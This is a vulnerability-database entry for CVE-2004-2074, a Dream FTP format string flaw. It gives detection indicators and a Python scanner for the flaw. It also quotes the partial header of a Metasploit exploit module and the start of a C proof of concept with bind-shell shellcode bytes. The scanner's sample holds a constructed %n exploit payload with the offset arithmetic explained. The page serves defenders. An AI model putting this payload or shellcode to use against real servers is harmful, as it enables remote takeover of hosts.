CVE-2004-2074
Published: 2004-12-31
Priority: P4 (23) · Severity: medium · CVSS 2.0 base score: 5 · Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P
Exploit: public exploit code available
EPSS: 35.78% (98.3rd percentile)
Format string vulnerability in Dream FTP 1.02 allows local users to cause a denial of service (crash) via format string specifiers in the (1) PASS or (2) RETR commands.
Note that the CVE text understates the issue: the CVSS 2.0 vector (AV:N), the 2004 Exploit-DB entry ("Remote User Name Format String", with port-binding cmd.exe shellcode) and the Metasploit module all describe remote code execution over the FTP control channel, with the USER command as the injection point in the original PoC.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bolintech | dream_ftp_server | — | — |
Detection & IOCs (extracted from sources)
Bytes: \xeb\x29 (short JMP stub at the start of the exploit's format string prefix)
- Detect exploit traffic on the FTP control channel (TCP 21) by matching the format string pattern: a run of %8x specifiers followed by a large-width %Nd and a %n, preceded by the \xeb\x29 JMP stub.
- Alert on FTP sessions where the USER command argument begins with the bytes EB 29 followed by repeated %8x specifiers; this is the exploit's fixed prologue.
- Monitor FTP server hosts for a new listening socket on TCP 28876 and for inbound connections to it: the SkyLined PoC's shellcode binds a cmd.exe shell on that port and reconnects after disconnect, so the indicator is a new listener on the victim, not an outbound connection from it.
- Check the FTP banner for 'Dream FTP Server' to identify vulnerable targets; the Metasploit module uses this string as its check condition.
- The CVE names the PASS and RETR commands as vectors and the PoC uses USER; monitor the arguments of all three for %n, %x, or large-width %d specifiers.
- The Metasploit module hardcodes a single "universal" offset (0x3c63FF - 0x4f = 3957680) aimed at the SEH handler; it was tested only against Windows 2000 SP0 and SP4 English and may not be reliable on other OS/SP combinations.
- Payload bad characters are \x00, \x0a and \x0d. This constrains shellcode selection, and detection signatures must not expect those bytes inside the payload; the FTP command line itself is still CRLF-terminated, so a signature may anchor on the terminator but not on anything within the argument.
- The original PoC targets Dream FTP v1.2 (also identified as 1.02 / TryFTP 1.0.0.1), so the vulnerability spans several version strings of the same product.
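The detection bullets above describe a pattern but not how to apply it to captured traffic. The following is an added example, not code from the CVE entry, the Metasploit module or SkyLined's PoC: it scans FTP control-channel command lines for the indicators listed (the EB 29 prologue, %n, runs of %x, a large-width %d) and, for a %n payload, predicts the value the %n write will store from the bytes printed before it. That prediction assumes the 32-bit behaviour the exploit relies on (%8x always prints exactly 8 characters, a %Nd prints at least N), which is why the PoC's offset arithmetic 0x3c63FF - 0x4f = 3957680 works. The sample session and the payload layout (39 literal bytes plus five %8x, so 0x4f bytes precede the %Nd) are constructed for the example.

```python
"""Scan FTP command lines for Dream FTP-style format-string payloads.

Added example (not the page's or Metasploit's code). Sample data is constructed.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# printf-style conversion: flags, width, optional precision, length, conversion
SPEC_RE = re.compile(rb"%([-+ #0]*)(\d*)(?:\.(\d*))?(hh|h|l|ll)?([diouxXcspn%])")
JMP_STUB = b"\xeb\x29"                                 # short JMP heading the PoC prefix
FTP_CMDS_OF_INTEREST = {b"USER", b"PASS", b"RETR"}    # USER (PoC), PASS/RETR (CVE text)


@dataclass
class Finding:
    command: bytes
    reasons: List[str] = field(default_factory=list)
    predicted_n_write: Optional[int] = None   # counter value the first %n stores

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def split_command(line: bytes):
    """Split b'USER foo\\r\\n' into (b'USER', b'foo')."""
    line = line.rstrip(b"\r\n")
    cmd, _, arg = line.partition(b" ")
    return cmd.upper(), arg


def predicted_n_write(arg: bytes) -> Optional[int]:
    """Lower bound on what a %n stores: literal bytes printed before it plus the
    field widths of the preceding conversions (assumes each value fits its width,
    true for %8x on a 32-bit target). Returns None if there is no %n."""
    printed = 0
    pos = 0
    for m in SPEC_RE.finditer(arg):
        printed += m.start() - pos          # literal bytes before this conversion
        pos = m.end()
        conv = m.group(5)
        if conv == b"n":
            return printed
        if conv == b"%":
            printed += 1
        else:
            printed += int(m.group(2)) if m.group(2) else 1
    return None


def scan_command(line: bytes) -> Finding:
    """Apply the page's indicators to one FTP command line."""
    cmd, arg = split_command(line)
    f = Finding(command=cmd)
    if cmd not in FTP_CMDS_OF_INTEREST:
        return f
    specs = SPEC_RE.findall(arg)
    convs = [s[4] for s in specs]
    if arg.startswith(JMP_STUB):
        f.reasons.append("EB 29 JMP stub prologue")
    if b"n" in convs:
        f.reasons.append("%n write primitive")
        f.predicted_n_write = predicted_n_write(arg)
    leaks = sum(1 for c in convs if c in (b"x", b"X", b"p"))
    if leaks >= 4:
        f.reasons.append(f"{leaks} stack-read specifiers (%x)")
    widths = [int(s[1]) for s in specs if s[1] and s[4] in (b"d", b"i", b"u")]
    if widths and max(widths) >= 1000:
        f.reasons.append(f"large field width {max(widths)}")
    return f


def scan_session(lines) -> List[Finding]:
    """Return only the suspicious commands of a captured session."""
    return [x for x in map(scan_command, lines) if x.suspicious]


# Constructed sample session: three benign commands and one exploit-shaped USER.
# 2 stub bytes + 37 filler + 5 * 8 chars from %8x = 0x4f bytes before the %Nd,
# so the %n counter reaches 0x4f + 3957680 = 0x3c63FF, the module's target.
EXPLOIT_ARG = JMP_STUB + b"A" * 37 + b"%8x" * 5 + b"%3957680d%n"
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS guest@example.com\r\n",
    b"RETR report-100%.txt\r\n",
    b"USER " + EXPLOIT_ARG + b"\r\n",
]

if __name__ == "__main__":
    for hit in scan_session(SAMPLE_SESSION):
        print(hit.command, hit.reasons, hex(hit.predicted_n_write or 0))
```

The `%` in a legitimate filename such as `report-100%.txt` is not a valid conversion and is ignored, so the scanner keys on real specifiers rather than on the percent sign alone; `predicted_n_write` is the triage step that turns a captured payload back into the address the attacker was writing.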
No detection rules found.
Exploit-DB · 2010-06-22
BolinTech DreamFTP Server 1.02 - Format String (Metasploit)
---
##
# $Id: dreamftp_format.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'BolinTech Dream FTP Server 1.02 Format String',
			'Description'    => %q{
					This module exploits a format string overflow in the BolinTech
					Dream FTP Server version 1.02. Based on the exploit by SkyLined.
			},
			'Author'         => [ 'Patrick Webster ' ],
			'Arch'           => [ ARCH_X86 ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9583 $',
			'References'     =>
				[
					[ 'CVE', '2004-2074'],
					[ 'OSVDB',
Exploit-DB · 2004-02-11
BolinTech DreamFTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String
---
#include
#include
#include
#include
// WIN NT/2K/XP cmd.exe shellcode
// kernel32.dll baseaddress calculation: OS/SP-independent
// string-save: 00, 0a and 0d free.
// portbinding: port 28876
// looping: reconnect after disconnect
char* shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8
Metasploit
BolinTech Dream FTP Server 1.02 Format String
This module exploits a format string overflow in the BolinTech Dream FTP Server version 1.02. Based on the exploit by SkyLined.
No writeups or analysis indexed.